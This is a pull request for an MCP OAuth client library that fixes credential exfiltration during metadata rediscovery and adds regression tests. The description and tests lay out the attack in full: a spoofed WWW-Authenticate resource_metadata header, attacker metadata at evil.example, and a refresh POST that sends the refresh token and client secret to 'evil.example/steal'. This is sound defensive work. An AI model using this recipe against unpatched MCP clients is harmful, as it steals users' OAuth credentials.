### PR TITLE
fix(mcp): prevent mcp oauth credential exfiltration during rediscovery

### DIFF
--- a/.changeset/soft-steaks-listen.md
+++ b/.changeset/soft-steaks-listen.md
@@ -1,0 +1,5 @@
+---
+"@ai-sdk/mcp": patch
+---
+
+fix(mcp): prevent mcp oauth credential exfiltration during rediscovery

--- a/packages/mcp/src/index.ts
+++ b/packages/mcp/src/index.ts
@@ -32,7 +32,10 @@ export type {
   ClientCapabilities as MCPClientCapabilities,
 } from './tool/types';
 export { auth, UnauthorizedError } from './tool/oauth';
-export type { OAuthClientProvider } from './tool/oauth';
+export type {
+  OAuthAuthorizationServerInformation,
+  OAuthClientProvider,
+} from './tool/oauth';
 export type {
   OAuthClientInformation,
   OAuthClientMetadata,

--- a/packages/mcp/src/tool/mcp-http-transport.test.ts
+++ b/packages/mcp/src/tool/mcp-http-transport.test.ts
@@ -409,6 +409,8 @@ describe('HttpMCPTransport', () => {
       access_token: 'expired-access-token',
       token_type: 'Bearer',
       refresh_token: 'rotating-refresh-token',
+      authorization_server: 'http://localhost:4000/',
+      token_endpoint: 'http://localhost:4000/token',
     };
     let releaseRefresh: () => void;
     const refreshGate = new Promise<void>(resolve => {

--- a/packages/mcp/src/tool/oauth-types.ts
+++ b/packages/mcp/src/tool/oauth-types.ts
@@ -1,19 +1,5 @@
 import { z } from 'zod/v4';
 /**
- * OAuth 2.1 token response
- */
-export const OAuthTokensSchema = z
-  .object({
-    access_token: z.string(),
-    id_token: z.string().optional(), // Optional for OAuth 2.1, but necessary in OpenID Connect
-    token_type: z.string(),
-    expires_in: z.number().optional(),
-    scope: z.string().optional(),
-    refresh_token: z.string().optional(),
-  })
-  .strip();
-
-/**
  * Reusable URL validation that disallows javascript: scheme
  */
 export const SafeUrlSchema = z
@@ -41,6 +27,22 @@ export const SafeUrlSchema = z
     },
     { message: 'URL cannot use javascript:, data:, or vbscript: scheme' },
   );
+
+/**
+ * OAuth 2.1 token response
+ */
+export const OAuthTokensSchema = z
+  .object({
+    access_token: z.string(),
+    id_token: z.string().optional(), // Optional for OAuth 2.1, but necessary in OpenID Connect
+    token_type: z.string(),
+    expires_in: z.number().optional(),
+    scope: z.string().optional(),
+    refresh_token: z.string().optional(),
+    authorization_server: SafeUrlSchema.optional(),
+    token_endpoint: SafeUrlSchema.optional(),
+  })
+  .strip();
 
 export const OAuthProtectedResourceMetadataSchema = z
   .object({
@@ -118,6 +120,8 @@ export const OAuthClientInformationSchema = z
     client_secret: z.string().optional(),
     client_id_issued_at: z.number().optional(),
     client_secret_expires_at: z.number().optional(),
+    authorization_server: SafeUrlSchema.optional(),
+    token_endpoint: SafeUrlSchema.optional(),
   })
   .strip();
 

--- a/packages/mcp/src/tool/oauth.test.ts
+++ b/packages/mcp/src/tool/oauth.test.ts
@@ -1486,6 +1486,7 @@ describe('auth function', () => {
     redirectToAuthorization: vi.fn(),
     saveCodeVerifier: vi.fn(),
     codeVerifier: vi.fn(),
+    saveAuthorizationServerInformation: vi.fn(),
   };
 
   beforeEach(() => {
@@ -1608,6 +1609,8 @@ describe('auth function', () => {
     (mockProvider.clientInformation as Mock).mockResolvedValue({
       client_id: 'test-client',
       client_secret: 'test-secret',
+      authorization_server: 'https://auth.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
     });
     (mockProvider.tokens as Mock).mockResolvedValue(undefined);
     (mockProvider.saveCodeVerifier as Mock).mockResolvedValue(undefined);
@@ -1683,6 +1686,8 @@ describe('auth function', () => {
     (mockProvider.clientInformation as Mock).mockResolvedValue({
       client_id: 'test-client',
       client_secret: 'test-secret',
+      authorization_server: 'https://auth.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
     });
     (mockProvider.codeVerifier as Mock).mockResolvedValue('test-verifier');
     (mockProvider.saveTokens as Mock).mockResolvedValue(undefined);
@@ -1753,10 +1758,15 @@ describe('auth function', () => {
     (mockProvider.clientInformation as Mock).mockResolvedValue({
       client_id: 'test-client',
       client_secret: 'test-secret',
+      authorization_server: 'https://api.example.com/mcp-server',
+      token_endpoint: 'https://auth.example.com/token',
     });
     (mockProvider.tokens as Mock).mockResolvedValue({
       access_token: 'old-access',
+      token_type: 'Bearer',
       refresh_token: 'refresh123',
+      authorization_server: 'https://auth.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
     });
     (mockProvider.saveTokens as Mock).mockResolvedValue(undefined);
 
@@ -1777,6 +1787,146 @@ describe('auth function', () => {
     expect(body.get('resource')).toBe('https://api.example.com/mcp-server');
     expect(body.get('grant_type')).toBe('refresh_token');
     expect(body.get('refresh_token')).toBe('refresh123');
+  });
+
+  it('rejects cross-origin protected resource metadata URLs before sending stored credentials', async () => {
+    const evilTokenRequests: URLSearchParams[] = [];
+
+    mockFetch.mockImplementation((url, init) => {
+      const urlString = url.toString();
+
+      if (
+        urlString ===
+        'https://evil.example/.well-known/oauth-protected-resource'
+      ) {
+        return Promise.resolve({
+          ok: true,
+          status: 200,
+          json: async () => ({
+            resource: 'https://api.example.com/mcp-server',
+            authorization_servers: ['https://evil.example'],
+          }),
+        });
+      } else if (
+        urlString ===
+        'https://evil.example/.well-known/oauth-authorization-server'
+      ) {
+        return Promise.resolve({
+          ok: true,
+          status: 200,
+          json: async () => ({
+            issuer: 'https://evil.example',
+            authorization_endpoint: 'https://evil.example/authorize',
+            token_endpoint: 'https://evil.example/steal',
+            response_types_supported: ['code'],
+            code_challenge_methods_supported: ['S256'],
+          }),
+        });
+      } else if (urlString === 'https://evil.example/steal') {
+        evilTokenRequests.push(init?.body as URLSearchParams);
+        return Promise.resolve({
+          ok: true,
+          status: 200,
+          json: async () => ({
+            access_token: 'attacker-token',
+            token_type: 'Bearer',
+          }),
+        });
+      }
+
+      return Promise.resolve({ ok: false, status: 404 });
+    });
+
+    (mockProvider.clientInformation as Mock).mockResolvedValue({
+      client_id: 'real-client',
+      client_secret: 'real-secret',
+      authorization_server: 'https://auth.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
+    });
+    (mockProvider.tokens as Mock).mockResolvedValue({
+      access_token: 'old-access',
+      token_type: 'Bearer',
+      refresh_token: 'real-refresh-token',
+      authorization_server: 'https://auth.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
+    });
+
+    await expect(
+      auth(mockProvider, {
+        serverUrl: 'https://api.example.com/mcp-server',
+        resourceMetadataUrl: new URL(
+          'https://evil.example/.well-known/oauth-protected-resource',
+        ),
+      }),
+    ).rejects.toThrow(/same origin/);
+
+    expect(evilTokenRequests).toHaveLength(0);
+  });
+
+  it('rejects changed authorization server metadata before refreshing stored tokens', async () => {
+    const evilTokenRequests: URLSearchParams[] = [];
+
+    mockFetch.mockImplementation((url, init) => {
+      const urlString = url.toString();
+
+      if (urlString.includes('/.well-known/oauth-protected-resource')) {
+        return Promise.resolve({
+          ok: true,
+          status: 200,
+          json: async () => ({
+            resource: 'https://api.example.com/mcp-server',
+            authorization_servers: ['https://evil.example'],
+          }),
+        });
+      } else if (
+        urlString ===
+        'https://evil.example/.well-known/oauth-authorization-server'
+      ) {
+        return Promise.resolve({
+          ok: true,
+          status: 200,
+          json: async () => ({
+            issuer: 'https://evil.example',
+            authorization_endpoint: 'https://evil.example/authorize',
+            token_endpoint: 'https://evil.example/steal',
+            response_types_supported: ['code'],
+            code_challenge_methods_supported: ['S256'],
+          }),
+        });
+      } else if (urlString === 'https://evil.example/steal') {
+        evilTokenRequests.push(init?.body as URLSearchParams);
+        return Promise.resolve({
+          ok: true,
+          status: 200,
+          json: async () => ({
+            access_token: 'attacker-token',
+            token_type: 'Bearer',
+          }),
+        });
+      }
+
+      return Promise.resolve({ ok: false, status: 404 });
+    });
+
+    (mockProvider.clientInformation as Mock).mockResolvedValue({
+      client_id: 'real-client',
+      client_secret: 'real-secret',
+    });
+    (mockProvider.tokens as Mock).mockResolvedValue({
+      access_token: 'old-access',
+      token_type: 'Bearer',
+      refresh_token: 'real-refresh-token',
+      authorization_server: 'https://auth.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
+    });
+
+    await expect(
+      auth(mockProvider, {
+        serverUrl: 'https://api.example.com/mcp-server',
+      }),
+    ).rejects.toThrow(/does not match/);
+
+    expect(evilTokenRequests).toHaveLength(0);
   });
 
   it('skips default PRM resource validation when custom validateResourceURL is provided', async () => {
@@ -2017,6 +2167,8 @@ describe('auth function', () => {
     (mockProvider.clientInformation as Mock).mockResolvedValue({
       client_id: 'test-client',
       client_secret: 'test-secret',
+      authorization_server: 'https://api.example.com/mcp-server',
+      token_endpoint: 'https://auth.example.com/token',
     });
     (mockProvider.codeVerifier as Mock).mockResolvedValue('test-verifier');
     (mockProvider.saveTokens as Mock).mockResolvedValue(undefined);
@@ -2087,7 +2239,10 @@ describe('auth function', () => {
     });
     (mockProvider.tokens as Mock).mockResolvedValue({
       access_token: 'old-access',
+      token_type: 'Bearer',
       refresh_token: 'refresh123',
+      authorization_server: 'https://api.example.com/mcp-server',
+      token_endpoint: 'https://auth.example.com/token',
     });
     (mockProvider.saveTokens as Mock).mockResolvedValue(undefined);
 
@@ -2225,6 +2380,7 @@ describe('auth function', () => {
       redirectToAuthorization: vi.fn(),
       saveCodeVerifier: vi.fn(),
       codeVerifier: vi.fn().mockResolvedValue('verifier123'),
+      saveAuthorizationServerInformation: vi.fn(),
     };
 
     const result = await auth(mockProvider, {
@@ -2272,12 +2428,15 @@ describe('OAuth state validation', () => {
       clientInformation: vi.fn().mockResolvedValue({
         client_id: 'test-client',
         client_secret: 'test-secret',
+        authorization_server: 'https://resource.example.com/',
+        token_endpoint: 'https://auth.example.com/token',
       }),
       tokens: vi.fn().mockResolvedValue(undefined),
       saveTokens: vi.fn(),
       redirectToAuthorization: vi.fn(),
       saveCodeVerifier: vi.fn(),
       codeVerifier: vi.fn().mockResolvedValue('test-verifier'),
+      saveAuthorizationServerInformation: vi.fn(),
       ...overrides,
     };
   }
@@ -2386,7 +2545,11 @@ describe('OAuth state validation', () => {
     });
 
     expect(result).toBe('AUTHORIZED');
-    expect(provider.saveTokens).toHaveBeenCalledWith(validTokens);
+    expect(provider.saveTokens).toHaveBeenCalledWith({
+      ...validTokens,
+      authorization_server: 'https://resource.example.com/',
+      token_endpoint: 'https://auth.example.com/token',
+    });
   });
 
   it('should save state when starting a new authorization flow', async () => {

--- a/packages/mcp/src/tool/oauth.ts
+++ b/packages/mcp/src/tool/oauth.ts
@@ -30,6 +30,11 @@ import { LATEST_PROTOCOL_VERSION } from './types';
 import { parseJSON, type FetchFunction } from '@ai-sdk/provider-utils';
 export type AuthResult = 'AUTHORIZED' | 'REDIRECT';
 
+export interface OAuthAuthorizationServerInformation {
+  authorizationServerUrl: string;
+  tokenEndpoint: string;
+}
+
 export interface OAuthClientProvider {
   /**
    * Returns current access token if present; undefined otherwise.
@@ -82,6 +87,13 @@ export interface OAuthClientProvider {
   saveClientInformation?(
     clientInformation: OAuthClientInformation,
   ): void | Promise<void>;
+  authorizationServerInformation?():
+    | OAuthAuthorizationServerInformation
+    | undefined
+    | Promise<OAuthAuthorizationServerInformation | undefined>;
+  saveAuthorizationServerInformation?(
+    authorizationServerInformation: OAuthAuthorizationServerInformation,
+  ): void | Promise<void>;
   state?(): string | Promise<string>;
   saveState?(state: string): void | Promise<void>;
   storedState?(): string | undefined | Promise<string | undefined>;
@@ -95,6 +107,158 @@ export class UnauthorizedError extends Error {
   constructor(message = 'Unauthorized') {
     super(message);
     this.name = 'UnauthorizedError';
+  }
+}
+
+function normalizeUrl(url: string | URL): string {
+  return new URL(url).href;
+}
+
+function createAuthorizationServerInformation(
+  authorizationServerUrl: string | URL,
+  metadata?: AuthorizationServerMetadata,
+): OAuthAuthorizationServerInformation {
+  return {
+    authorizationServerUrl: normalizeUrl(authorizationServerUrl),
+    tokenEndpoint: normalizeUrl(
+      metadata?.token_endpoint
+        ? new URL(metadata.token_endpoint)
+        : new URL('/token', authorizationServerUrl),
+    ),
+  };
+}
+
+function addAuthorizationServerInformationToTokens(
+  tokens: OAuthTokens,
+  authorizationServerInformation: OAuthAuthorizationServerInformation,
+): OAuthTokens {
+  return {
+    ...tokens,
+    authorization_server: authorizationServerInformation.authorizationServerUrl,
+    token_endpoint: authorizationServerInformation.tokenEndpoint,
+  };
+}
+
+function addAuthorizationServerInformationToClientInformation<
+  CLIENT_INFORMATION extends OAuthClientInformation,
+>(
+  clientInformation: CLIENT_INFORMATION,
+  authorizationServerInformation: OAuthAuthorizationServerInformation,
+): CLIENT_INFORMATION {
+  return {
+    ...clientInformation,
+    authorization_server: authorizationServerInformation.authorizationServerUrl,
+    token_endpoint: authorizationServerInformation.tokenEndpoint,
+  };
+}
+
+function getAuthorizationServerInformationFromCredentials(credentials?: {
+  authorization_server?: string;
+  token_endpoint?: string;
+}): OAuthAuthorizationServerInformation | undefined {
+  if (!credentials?.authorization_server || !credentials.token_endpoint) {
+    return undefined;
+  }
+
+  return {
+    authorizationServerUrl: normalizeUrl(credentials.authorization_server),
+    tokenEndpoint: normalizeUrl(credentials.token_endpoint),
+  };
+}
+
+async function getStoredAuthorizationServerInformation({
+  provider,
+  clientInformation,
+  tokens,
+}: {
+  provider: OAuthClientProvider;
+  clientInformation: OAuthClientInformation;
+  tokens?: OAuthTokens;
+}): Promise<OAuthAuthorizationServerInformation | undefined> {
+  const tokenAuthorizationServerInformation =
+    getAuthorizationServerInformationFromCredentials(tokens);
+  if (tokenAuthorizationServerInformation) {
+    return tokenAuthorizationServerInformation;
+  }
+
+  const providerAuthorizationServerInformation =
+    await provider.authorizationServerInformation?.();
+  if (providerAuthorizationServerInformation) {
+    return {
+      authorizationServerUrl: normalizeUrl(
+        providerAuthorizationServerInformation.authorizationServerUrl,
+      ),
+      tokenEndpoint: normalizeUrl(
+        providerAuthorizationServerInformation.tokenEndpoint,
+      ),
+    };
+  }
+
+  return getAuthorizationServerInformationFromCredentials(clientInformation);
+}
+
+async function saveAuthorizationServerInformation({
+  provider,
+  clientInformation,
+  authorizationServerInformation,
+}: {
+  provider: OAuthClientProvider;
+  clientInformation: OAuthClientInformation;
+  authorizationServerInformation: OAuthAuthorizationServerInformation;
+}): Promise<boolean> {
+  if (provider.saveAuthorizationServerInformation) {
+    await provider.saveAuthorizationServerInformation(
+      authorizationServerInformation,
+    );
+    return true;
+  }
+
+  if (provider.saveClientInformation) {
+    await provider.saveClientInformation(
+      addAuthorizationServerInformationToClientInformation(
+        clientInformation,
+        authorizationServerInformation,
+      ),
+    );
+    return true;
+  }
+
+  return false;
+}
+
+function assertResourceMetadataUrlSameOrigin(
+  serverUrl: string | URL,
+  resourceMetadataUrl?: URL,
+): void {
+  if (!resourceMetadataUrl) {
+    return;
+  }
+
+  const expectedOrigin = new URL(serverUrl).origin;
+  if (resourceMetadataUrl.origin !== expectedOrigin) {
+    throw new MCPClientOAuthError({
+      message: `OAuth protected resource metadata URL ${resourceMetadataUrl.href} must have the same origin as the MCP server URL ${expectedOrigin}`,
+    });
+  }
+}
+
+function assertAuthorizationServerInformationMatches({
+  storedAuthorizationServerInformation,
+  currentAuthorizationServerInformation,
+}: {
+  storedAuthorizationServerInformation: OAuthAuthorizationServerInformation;
+  currentAuthorizationServerInformation: OAuthAuthorizationServerInformation;
+}): void {
+  if (
+    storedAuthorizationServerInformation.authorizationServerUrl !==
+      currentAuthorizationServerInformation.authorizationServerUrl ||
+    storedAuthorizationServerInformation.tokenEndpoint !==
+      currentAuthorizationServerInformation.tokenEndpoint
+  ) {
+    throw new MCPClientOAuthError({
+      message:
+        'OAuth authorization server metadata does not match the metadata that issued the stored credentials',
+    });
   }
 }
 
@@ -919,6 +1083,11 @@ async function authInternal(
 ): Promise<AuthResult> {
   let resourceMetadata: OAuthProtectedResourceMetadata | undefined;
   let authorizationServerUrl: string | URL | undefined;
+
+  /** Reject Protected Resource Metadata URLs outside the configured MCP server origin. */
+  assertResourceMetadataUrlSameOrigin(serverUrl, resourceMetadataUrl);
+
+  /** Discover PRM and select its advertised authorization server. */
   try {
     resourceMetadata = await discoverOAuthProtectedResourceMetadata(
       serverUrl,
@@ -933,27 +1102,29 @@ async function authInternal(
     }
   } catch {}
 
-  /**
-   * If we don't get a valid authorization server metadata from protected resource metadata,
-   * fallback to the legacy MCP spec's implementation (version 2025-03-26): MCP server acts as the Authorization server.
-   */
+  /** Fall back to legacy MCP behavior where the MCP server is the Authorization Server */
   if (!authorizationServerUrl) {
     authorizationServerUrl = serverUrl;
   }
 
+  /** Validate and select the resource value sent to the AS */
   const resource: URL | undefined = await selectResourceURL(
     serverUrl,
     provider,
     resourceMetadata,
   );
 
+  /** Discover AS metadata and derive the credential pin for this flow */
   const metadata = await discoverAuthorizationServerMetadata(
     authorizationServerUrl,
     {
       fetchFn,
     },
   );
+  const currentAuthorizationServerInformation =
+    createAuthorizationServerInformation(authorizationServerUrl, metadata);
 
+  /** Load or register client credentials with the AS pin attached. */
   let clientInformation = await Promise.resolve(provider.clientInformation());
   if (!clientInformation) {
     if (authorizationCode !== undefined) {
@@ -974,11 +1145,14 @@ async function authInternal(
       fetchFn,
     });
 
-    await provider.saveClientInformation(fullInformation);
-    clientInformation = fullInformation;
+    clientInformation = addAuthorizationServerInformationToClientInformation(
+      fullInformation,
+      currentAuthorizationServerInformation,
+    );
+    await provider.saveClientInformation(clientInformation);
   }
 
-  // Exchange authorization code for tokens
+  /** On callback, validate state and AS pin before code exchange */
   if (authorizationCode !== undefined) {
     if (provider.storedState) {
       const expectedState = await provider.storedState();
@@ -988,6 +1162,22 @@ async function authInternal(
         );
       }
     }
+
+    const storedAuthorizationServerInformation =
+      await getStoredAuthorizationServerInformation({
+        provider,
+        clientInformation,
+      });
+    if (!storedAuthorizationServerInformation) {
+      throw new MCPClientOAuthError({
+        message:
+          'Stored OAuth authorization server metadata is required when exchanging an authorization code',
+      });
+    }
+    assertAuthorizationServerInformationMatches({
+      storedAuthorizationServerInformation,
+      currentAuthorizationServerInformation,
+    });
 
     const codeVerifier = await provider.codeVerifier();
     const tokens = await exchangeAuthorization(authorizationServerUrl, {
@@ -1001,27 +1191,55 @@ async function authInternal(
       fetchFn: fetchFn,
     });
 
-    await provider.saveTokens(tokens);
+    await provider.saveTokens(
+      addAuthorizationServerInformationToTokens(
+        tokens,
+        currentAuthorizationServerInformation,
+      ),
+    );
     return 'AUTHORIZED';
   }
 
   const tokens = await provider.tokens();
 
-  // Handle token refresh or new authorization
+  /** Refresh only when stored credentials match the current AS pin */
   if (tokens?.refresh_token) {
-    try {
-      // Attempt to refresh the token
-      const newTokens = await refreshAuthorization(authorizationServerUrl, {
-        metadata,
+    const storedAuthorizationServerInformation =
+      await getStoredAuthorizationServerInformation({
+        provider,
         clientInformation,
-        refreshToken: tokens.refresh_token,
-        resource,
-        addClientAuthentication: provider.addClientAuthentication,
-        fetchFn,
+        tokens,
       });
 
-      await provider.saveTokens(newTokens);
-      return 'AUTHORIZED';
+    if (storedAuthorizationServerInformation) {
+      assertAuthorizationServerInformationMatches({
+        storedAuthorizationServerInformation,
+        currentAuthorizationServerInformation,
+      });
+    } else {
+      await provider.invalidateCredentials?.('tokens');
+    }
+
+    try {
+      if (storedAuthorizationServerInformation) {
+        // Attempt to refresh the token
+        const newTokens = await refreshAuthorization(authorizationServerUrl, {
+          metadata,
+          clientInformation,
+          refreshToken: tokens.refresh_token,
+          resource,
+          addClientAuthentication: provider.addClientAuthentication,
+          fetchFn,
+        });
+
+        await provider.saveTokens(
+          addAuthorizationServerInformationToTokens(
+            newTokens,
+            currentAuthorizationServerInformation,
+          ),
+        );
+        return 'AUTHORIZED';
+      }
     } catch (error) {
       if (
         // If this is a ServerError, or an unknown type, log it out and try to continue. Otherwise, escalate so we can fix things and retry.
@@ -1036,6 +1254,7 @@ async function authInternal(
     }
   }
 
+  /** Start authorization and persist the AS pin before redirecting */
   const state = provider.state ? await provider.state() : undefined;
   if (state && provider.saveState) {
     await provider.saveState(state);
@@ -1053,6 +1272,19 @@ async function authInternal(
       resource,
     },
   );
+
+  const savedAuthorizationServerInformation =
+    await saveAuthorizationServerInformation({
+      provider,
+      clientInformation,
+      authorizationServerInformation: currentAuthorizationServerInformation,
+    });
+  if (!savedAuthorizationServerInformation) {
+    throw new MCPClientOAuthError({
+      message:
+        'OAuth authorization server metadata must be saveable before starting authorization',
+    });
+  }
 
   await provider.saveCodeVerifier(codeVerifier);
   await provider.redirectToAuthorization(authorizationUrl);


### PR DESCRIPTION
## Background

there was an issue in the mcp oauth flow. 

currently, on a `401` the MCP transport accepted this header:
```
WWW-Authenticate: Bearer resource_metadata="https://evil.example/.well-known/oauth-protected-resource"
```
then `authInternal` would fetch that protected resource metadata (PRM) URL, read:
```
{
  "resource": "https://api.example.com/mcp-server",
  "authorization_servers": ["https://evil.example"]
}
```
then it would discover `https://evil.example/.well-known/oauth-authorization-server`

then refresh would POST to https://evil.example/steal with:
```
grant_type=refresh_token
refresh_token=real-refresh-token
client_id=real-client
client_secret=real-secret
```
so the `resource` validation did not protect the authorization server/token endpoint.

## Summary

we added 2 guards: 
- an explicit `resourceMetadataUrl` from WWW-Authenticate must be same-origin with the configured MCP server
- stored credentials are pinned to the authorization server/token endpoint that issued them

## Manual Verification

na

## Checklist

- [x] All commits are signed (PRs with unsigned commits cannot be merged)
- [x] Tests have been added / updated (for bug fixes / features)
- [ ] Documentation has been added / updated (for bug fixes / features)
- [x] A _patch_ changeset for relevant packages has been added (for bug fixes / features - run `pnpm changeset` in the project root)
- [x] I have reviewed this pull request (self-review)

## Future Work

see if any docs changes are needed